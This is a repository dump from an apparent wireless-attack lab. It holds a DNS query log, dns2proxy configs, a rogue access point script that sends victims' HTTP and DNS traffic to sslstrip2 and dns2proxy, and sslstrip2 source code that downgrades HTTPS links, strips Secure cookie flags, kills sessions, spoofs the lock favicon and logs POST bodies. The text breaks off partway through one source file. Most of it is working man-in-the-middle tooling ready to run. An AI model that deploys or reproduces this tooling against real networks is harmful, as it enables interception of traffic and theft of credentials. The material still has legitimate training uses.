01:59:50 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 122 | 2017-06-27 01:59:52 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 123 | 2017-06-27 01:59:54 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 124 | 2017-06-27 01:59:58 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 125 | 2017-06-27 02:00:01 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 126 | 2017-06-27 02:00:02 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 127 | 2017-06-27 02:00:04 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 128 | 2017-06-27 02:00:06 Client IP: 10.0.0.98 request is android.clients.google.com. IN A 129 | 2017-06-27 02:00:07 Client IP: 10.0.0.98 request is android.clients.google.com. 
IN A 130 | -------------------------------------------------------------------------------- /lab4/dns2proxy/domains.cfg: -------------------------------------------------------------------------------- 1 | .domain.com 10.0.0.1 2 | 3 | -------------------------------------------------------------------------------- /lab4/dns2proxy/fhtagn.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | iptables -P INPUT ACCEPT 4 | iptables -F 5 | iptables -F -t nat 6 | 7 | killall python2.6 8 | -------------------------------------------------------------------------------- /lab4/dns2proxy/ia.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Lanzar: start.sh 4 | # 5 | # Example: start.sh eth0 192.168.1.101 192.168.1.200 6 | 7 | 8 | 9 | interfaz=$1 10 | dnsserver=$2 11 | routingIP=$3 12 | 13 | adminIP="192.168.1.82" 14 | 15 | ifconfig $interfaz:1 $routingIP 16 | 17 | iptables -F 18 | iptables -F -t nat 19 | iptables -P INPUT DROP 20 | iptables -A INPUT -p tcp --dport 443 -j REJECT --reject-with tcp-reset 21 | #iptables -A INPUT -p tcp --dport 443 -j ACCEPT 22 | iptables -A INPUT -p tcp --dport 80 -j ACCEPT 23 | iptables -A INPUT -s $adminIP -j ACCEPT 24 | 25 | #iptables -A INPUT -p tcp --dport 5900 -j ACCEPT 26 | #iptables -A INPUT -p tcp --dport 5901 -j ACCEPT 27 | iptables -A INPUT -p udp --dport 53 -j ACCEPT 28 | iptables -A INPUT -p udp --sport 53 -j ACCEPT 29 | 30 | iptables -A INPUT -p udp -j REJECT 31 | iptables -A INPUT -p icmp -j REJECT 32 | iptables -A INPUT -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT 33 | 34 | modprobe ip_nat_ftp 35 | modprobe ip_conntrack_ftp 36 | iptables -A INPUT -m helper --helper ftp -j ACCEPT 37 | 38 | python2.6 dns2proxy.py $interfaz $dnsserver $routingIP 39 | 40 | 41 | -------------------------------------------------------------------------------- /lab4/dns2proxy/nospoof.cfg: 
-------------------------------------------------------------------------------- 1 | imap.gmail.com 2 | -------------------------------------------------------------------------------- /lab4/dns2proxy/nospoofto.cfg: -------------------------------------------------------------------------------- 1 | 127.0.0.1 -------------------------------------------------------------------------------- /lab4/dns2proxy/resolv.conf: -------------------------------------------------------------------------------- 1 | nameserver 8.8.8.8 2 | -------------------------------------------------------------------------------- /lab4/dns2proxy/spoof.cfg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /lab4/dns2proxy/transform.cfg: -------------------------------------------------------------------------------- 1 | #Transformation file 2 | wwww.:www. 3 | social.:www. 4 | web: 5 | cuentas:accounts 6 | gmail:mail 7 | chatenabled.gmail.google.com:chatenabled.mail.google.com 8 | -------------------------------------------------------------------------------- /lab4/dns2proxy/victims.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/dns2proxy/victims.cfg -------------------------------------------------------------------------------- /lab4/partial-hsts-bypass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # PHY == the network card used to create our access point 4 | phy=wlan0 5 | 6 | # upstream == the network card that serves as our interface to the network 7 | # gateway. To build our NAT, we route packets between PHY and upstream. 8 | upstream=eth0 9 | 10 | # Set bssid to mac addess... really this could be set to any valid bssid. 
# Derive a BSSID from the AP card's current MAC address. Really this could
# be any valid BSSID; the card's own MAC is just a convenient choice.
# (Fixed: previously hard-coded "wlan0" instead of using $phy.)
bssid="$(macchanger -s "$phy" | tail -n1 | awk '{ print $3 }')"

# essid == the first command line argument
essid="$1"

# channel == the second command line argument
channel="$2"

# Refuse to run with missing arguments; otherwise we would write a broken
# hostapd.conf and fail much later with a confusing error.
if [ -z "$essid" ] || [ -z "$channel" ]; then
    echo "Usage: $0 <essid> <channel>" >&2
    exit 1
fi

echo "[*] Starting hotspot script..."
echo "[*] Using configs:"

echo "[*] --> essid: $essid"
echo "[*] --> bssid: $bssid"
echo "[*] --> channel: $channel"
echo "[*] --> AP interface: $phy"
echo "[*] --> upstream interface: $upstream"

# Mercilessly destroy interfering processes. There is a more elegant
# way to do this using nmcli, but ain't nobody got time for that shit. ;)

echo "[*] Stopping NetworkManager..."
systemctl stop network-manager
sleep 3

# Stopping network-manager will push a soft block on our wireless interfaces.
# We need to undo that.
echo "[*] Removing soft block on wireless interfaces..."
rfkill unblock wlan

# Stopping network-manager will also disable all of our network interfaces.
# Let's reenable them.
echo "[*] Reenabling $phy interface"
ifconfig "$phy" up

# Next we create a hostapd config file: the AP interface, our ESSID, BSSID
# and channel, and finally hw_mode=g for compatibility with our TP-Link
# cards. A single here-doc replaces the previous chain of echo appends.
echo "[*] Creating hostapd config file...."
cat > hostapd.conf <<EOF
interface=$phy
ssid=$essid
bssid=$bssid
channel=$channel
hw_mode=g
EOF

# Now that we have a config file, start hostapd as a background process.
echo "[*] Starting hostapd"
hostapd ./hostapd.conf &
sleep 7

echo "[*] AP started, using IP 10.0.0.1, network 10.0.0.0/24"
# Give our new AP an IP address and subnet mask
ifconfig "$phy" 10.0.0.1 netmask 255.255.255.0

# Update routing table to allow rogue AP to serve as default gateway
# of its subnet
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

# Next we create our dnsmasq config. Remember we're only using dnsmasq as
# a DHCP server at this time.
#
#   dhcp-range       - DHCP pool of 10.0.0.80-10.0.0.254, 6 hour leases
#   dhcp-option=6,.. - tell clients to use Google (8.8.8.8) as DNS server
#   dhcp-option=3,.. - tell clients to use our rogue AP as their gateway
#   dhcp-authoritative / log-queries - act as the authoritative DHCP
#                      server on this segment and log DHCP queries
echo "[*] Creating dnsmasq config file..."
cat > dnsmasq.conf <<EOF
dhcp-range=10.0.0.80,10.0.0.254,6h
dhcp-option=6,8.8.8.8
dhcp-option=3,10.0.0.1
dhcp-authoritative
log-queries
EOF

# Finally we start dnsmasq, telling it to use our config file. By default,
# dnsmasq binds to the wildcard address. Since we don't want dnsmasq to do
# this, we keep it from doing so using the -z flag. Additionally, we use
# the -i flag to force dnsmasq to only listen on our $phy interface.
# We use the -I flag to explicitly forbid dnsmasq from running on our
# local interface.

echo "[*] Starting dnsmasq as DHCP server... DNS set to 8.8.8.8"
dnsmasq -z -p 0 -C ./dnsmasq.conf -i "$phy" -I lo

# We enable packet forwarding by interfacing with the /proc file system.
echo "[*] Enabling packet forwarding"
echo '1' > /proc/sys/net/ipv4/ip_forward

echo "[*] Performing iptables magic"

# We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept
# all by default.
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT

# We then flush all tables to give ourselves a clean slate.
iptables --flush
iptables --table nat --flush

# Next we append a rule to the POSTROUTING chain of iptables. Changes
# made to the POSTROUTING chain are not visible to the Linux kernel since
# the chain is applied to every packet before it leaves the system. The
# MASQUERADE target sets the source IP address to the outbound NIC's
# external IP address. This effectively creates a NAT.
#
# To summarize, we tell iptables to change the source IP address of each
# packet to that of $upstream and to send each packet to $upstream after
# this modification occurs.
iptables --table nat --append POSTROUTING -o "$upstream" --jump MASQUERADE
iptables --append FORWARD -i "$phy" -o "$upstream" --jump ACCEPT

# Redirect plaintext HTTP into sslstrip's listener on port 10000.
iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 10000
#iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 10000

# Force all client DNS traffic to our dns2proxy instance on 10.0.0.1.
#iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53
iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump DNAT --to 10.0.0.1

iptables --table nat --append POSTROUTING --jump MASQUERADE

# Start the HSTS-bypass proxy pair: sslstrip2 listens on the redirected
# HTTP port, dns2proxy undoes its hostname rewrites at the DNS layer.
# (Fixed: dns2proxy previously hard-coded wlan0 instead of $phy.)
python ./sslstrip2/sslstrip.py -l 10000 -p -w ./sslstrip.log &
python ./dns2proxy/dns2proxy.py -i "$phy" &

read -p 'Hotspot ready. Press enter to quit...'

# kill the daemon processes that we started earlier
echo "[*] Killing daemons"
killall dnsmasq
killall hostapd
killall python
sleep 5

# We set a policy for the INPUT, FORWARD, and OUTPUT chains to accept
# all by default.
echo "[*] Restoring iptables"
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT

# We then flush all tables to give ourselves a clean slate.
iptables --flush
iptables --table nat --flush
--------------------------------------------------------------------------------
/lab4/sslstrip2/.gitignore:
--------------------------------------------------------------------------------
*.pyc
--------------------------------------------------------------------------------
/lab4/sslstrip2/README:
--------------------------------------------------------------------------------
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.
3 | 4 | It requires Python 2.5 or newer, along with the 'twisted' python module. 5 | 6 | Installing: 7 | * Unpack: tar zxvf sslstrip-0.5.tar.gz 8 | * Install twisted: sudo apt-get install python-twisted-web 9 | * (Optionally) run 'python setup.py install' as root to install, 10 | or you can just run it out of the directory. 11 | 12 | Running: 13 | sslstrip can be run from the source base without installation. 14 | Just run 'python sslstrip.py -h' as a non-root user to get the 15 | command-line options. 16 | 17 | The four steps to getting this working (assuming you're running Linux) 18 | are: 19 | 20 | 1) Flip your machine into forwarding mode (as root): 21 | echo "1" > /proc/sys/net/ipv4/ip_forward 22 | 23 | 2) Setup iptables to intercept HTTP requests (as root): 24 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 25 | 26 | 3) Run sslstrip with the command-line options you'd like (see above). 27 | 28 | 4) Run arpspoof to redirect traffic to your machine (as root): 29 | arpspoof -i -t 30 | 31 | More Info: 32 | http://www.thoughtcrime.org/software/sslstrip/ 33 | -------------------------------------------------------------------------------- /lab4/sslstrip2/README.md: -------------------------------------------------------------------------------- 1 | SSLStrip+ 2 | ========= 3 | 4 | This is a new version of [Moxie´s SSLstrip] (http://www.thoughtcrime.org/software/sslstrip/) with the new feature to avoid HTTP Strict Transport Security (HSTS) protection mechanism. 5 | 6 | This version changes HTTPS to HTTP as the original one plus the hostname at html code to avoid HSTS. Check my slides at BlackHat ASIA 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) for more information. 7 | 8 | For this to work you also need a DNS server that reverse the changes made by the proxy, you can find it at https://github.com/LeonardoNve/dns2proxy. 
9 | 10 | 11 | Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48 12 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random, re 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | class ClientRequest(Request): 38 | 39 | ''' This class represents incoming client requests and is essentially where 40 | the magic begins. 
Here we remove the client headers we dont like, and then 41 | respond with either favicon spoofing, session denial, or proxy through HTTP 42 | or SSL to the server. 43 | ''' 44 | 45 | def __init__(self, channel, queued, reactor=reactor): 46 | Request.__init__(self, channel, queued) 47 | self.reactor = reactor 48 | self.urlMonitor = URLMonitor.getInstance() 49 | self.cookieCleaner = CookieCleaner.getInstance() 50 | self.dnsCache = DnsCache.getInstance() 51 | # self.uniqueId = random.randint(0, 10000) 52 | 53 | def cleanHeaders(self): 54 | headers = self.getAllHeaders().copy() 55 | 56 | if 'accept-encoding' in headers: 57 | del headers['accept-encoding'] 58 | 59 | if 'referer' in headers: 60 | real = self.urlMonitor.real 61 | if len(real)>0: 62 | dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) 63 | headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) 64 | 65 | if 'if-modified-since' in headers: 66 | del headers['if-modified-since'] 67 | 68 | if 'cache-control' in headers: 69 | del headers['cache-control'] 70 | 71 | if 'if-none-match' in headers: 72 | del headers['if-none-match'] 73 | 74 | if 'host' in headers: 75 | host = self.urlMonitor.URLgetRealHost("%s"%headers['host']) 76 | logging.debug("Modifing HOST header: %s -> %s"%(headers['host'],host)) 77 | headers['host'] = host 78 | headers['securelink'] = '1' 79 | self.setHeader('Host',host) 80 | 81 | return headers 82 | 83 | def getPathFromUri(self): 84 | if (self.uri.find("http://") == 0): 85 | index = self.uri.find('/', 7) 86 | return self.uri[index:] 87 | 88 | return self.uri 89 | 90 | 91 | def getPathToLockIcon(self): 92 | if os.path.exists("lock.ico"): return "lock.ico" 93 | 94 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 95 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 96 | 97 | if os.path.exists(scriptPath): return scriptPath 98 | 99 | logging.warning("Error: Could not find lock.ico") 100 | return 
"lock.ico" 101 | 102 | def save_req(self,lfile,str): 103 | f = open(lfile,"a") 104 | f.write(str) 105 | f.close() 106 | 107 | def handleHostResolvedSuccess(self, address): 108 | headers = self.cleanHeaders() 109 | # for header in headers: 110 | # logging.debug("HEADER %s = %s",header,headers[header]) 111 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address)) 112 | lhost = self.getHeader("host").lower() 113 | host = self.urlMonitor.URLgetRealHost("%s"%lhost) 114 | client = self.getClientIP() 115 | path = self.getPathFromUri() 116 | self.content.seek(0,0) 117 | postData = self.content.read() 118 | real = self.urlMonitor.real 119 | patchDict = self.urlMonitor.patchDict 120 | 121 | if len(real)>0: 122 | dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) 123 | path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path) 124 | postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData) 125 | if len(patchDict)>0: 126 | dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) 127 | postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData) 128 | 129 | url = 'http://' + host + path 130 | headers['content-length']="%d"%len(postData) 131 | 132 | self.dnsCache.cacheResolution(host, address) 133 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 134 | logging.debug("Sending expired cookies...") 135 | self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 136 | host, headers, path)) 137 | elif (self.urlMonitor.isSecureFavicon(client, path)): 138 | logging.debug("Sending spoofed favicon response...") 139 | self.sendSpoofedFaviconResponse() 140 | elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): 141 | if 'securelink' in headers: 142 | del headers['securelink'] 143 | logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url)) 144 | 
self.proxyViaSSL(address, self.method, path, postData, headers, 145 | self.urlMonitor.getSecurePort(client, url)) 146 | else: 147 | logging.debug("LEO Sending request via HTTP...") 148 | self.proxyViaHTTP(address, self.method, path, postData, headers) 149 | 150 | def handleHostResolvedError(self, error): 151 | logging.warning("Host resolution error: " + str(error)) 152 | self.finish() 153 | 154 | def resolveHost(self, host): 155 | address = self.dnsCache.getCachedAddress(host) 156 | 157 | if address != None: 158 | logging.debug("Host cached.") 159 | return defer.succeed(address) 160 | else: 161 | logging.debug("Host not cached.") 162 | return reactor.resolve(host) 163 | 164 | def process(self): 165 | host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host')) 166 | logging.debug("Resolving host: %s" % host) 167 | deferred = self.resolveHost(host) 168 | 169 | deferred.addCallback(self.handleHostResolvedSuccess) 170 | deferred.addErrback(self.handleHostResolvedError) 171 | 172 | def proxyViaHTTP(self, host, method, path, postData, headers): 173 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 174 | self.save_req("debug_ssl.log",method+' http://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') 175 | connectionFactory.protocol = ServerConnection 176 | self.reactor.connectTCP(host, 80, connectionFactory) 177 | 178 | def proxyViaSSL(self, host, method, path, postData, headers, port): 179 | self.save_req("debug_ssl.log",method+' https://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') 180 | clientContextFactory = ssl.ClientContextFactory() 181 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 182 | connectionFactory.protocol = SSLServerConnection 183 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 184 | 185 | def sendExpiredCookies(self, host, path, expireHeaders): 186 | self.setResponseCode(302, "Moved") 187 | self.setHeader("Connection", "close") 188 | 
self.setHeader("Location", "http://" + host + path) 189 | 190 | for header in expireHeaders: 191 | self.setHeader("Set-Cookie", header) 192 | 193 | self.finish() 194 | 195 | def sendSpoofedFaviconResponse(self): 196 | icoFile = open(self.getPathToLockIcon()) 197 | 198 | self.setResponseCode(200, "OK") 199 | self.setHeader("Content-type", "image/x-icon") 200 | self.write(icoFile.read()) 201 | 202 | icoFile.close() 203 | self.finish() 204 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 27 | 28 | The rule with cookies is that specific overrides general. 
So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 | expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return 
expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." + hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 
6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 
29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | newvalues =[] 49 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 50 | values = value.split(';') 51 | for v in values: 52 | if v[:7].lower()==' domain': 53 | dominio=v.split("=")[1] 54 | logging.debug("LEO Parsing cookie domain parameter: %s"%v) 55 | real = self.urlMonitor.sustitucion 56 | if dominio in real: 57 | v=" Domain=%s"%real[dominio] 58 | logging.debug("LEO New cookie domain parameter: %s"%v) 59 | newvalues.append(v) 60 | value = ';'.join(newvalues) 61 | 62 | if (key.lower() == 'access-control-allow-origin'): 63 | value='*' 64 | 65 | ServerConnection.handleHeader(self, key, value) 66 | 67 | def stripFileFromPath(self, path): 68 | (strippedPath, lastSlash, file) = path.rpartition('/') 69 | return strippedPath 70 | 71 | def buildAbsoluteLink(self, link): 72 | absoluteLink = "" 73 | 74 | if ((not link.startswith('http')) and (not link.startswith('/'))): 75 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 76 | 77 | logging.debug("Found path-relative link in secure transmission: " + link) 78 | logging.debug("New Absolute path-relative link: " + absoluteLink) 79 | elif not link.startswith('http'): 80 | absoluteLink 
= "http://"+self.headers['host']+link 81 | 82 | logging.debug("Found relative link in secure transmission: " + link) 83 | logging.debug("New Absolute link: " + absoluteLink) 84 | 85 | if not absoluteLink == "": 86 | absoluteLink = absoluteLink.replace('&', '&') 87 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 88 | 89 | def replaceCssLinks(self, data): 90 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 91 | 92 | for match in iterator: 93 | self.buildAbsoluteLink(match.group(1)) 94 | 95 | return data 96 | 97 | def replaceFavicon(self, data): 98 | match = re.search(SSLServerConnection.iconExpression, data) 99 | 100 | if (match != None): 101 | data = re.sub(SSLServerConnection.iconExpression, 102 | "", data) 103 | else: 104 | data = re.sub(SSLServerConnection.headExpression, 105 | "", data) 106 | 107 | return data 108 | 109 | def replaceSecureLinks(self, data): 110 | data = ServerConnection.replaceSecureLinks(self, data) 111 | data = self.replaceCssLinks(data) 112 | 113 | if (self.urlMonitor.isFaviconSpoofing()): 114 | data = self.replaceFavicon(data) 115 | 116 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 117 | 118 | for match in iterator: 119 | self.buildAbsoluteLink(match.group(10)) 120 | 121 | return data 122 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.6/sslstrip/ServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 
7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string, random, zlib, gzip, StringIO 20 | 21 | from twisted.web.http import HTTPClient 22 | from URLMonitor import URLMonitor 23 | 24 | class ServerConnection(HTTPClient): 25 | 26 | ''' The server connection is where we do the bulk of the stripping. Everything that 27 | comes back is examined. The headers we dont like are removed, and the links are stripped 28 | from HTTPS to HTTP. 29 | ''' 30 | 31 | urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) 32 | urlType = re.compile(r"https://", re.IGNORECASE) 33 | urlTypewww = re.compile(r"https://www", re.IGNORECASE) 34 | urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 35 | urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 36 | urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) 37 | urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) 38 | # urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) 39 | 40 | def __init__(self, command, uri, postData, headers, client): 41 | 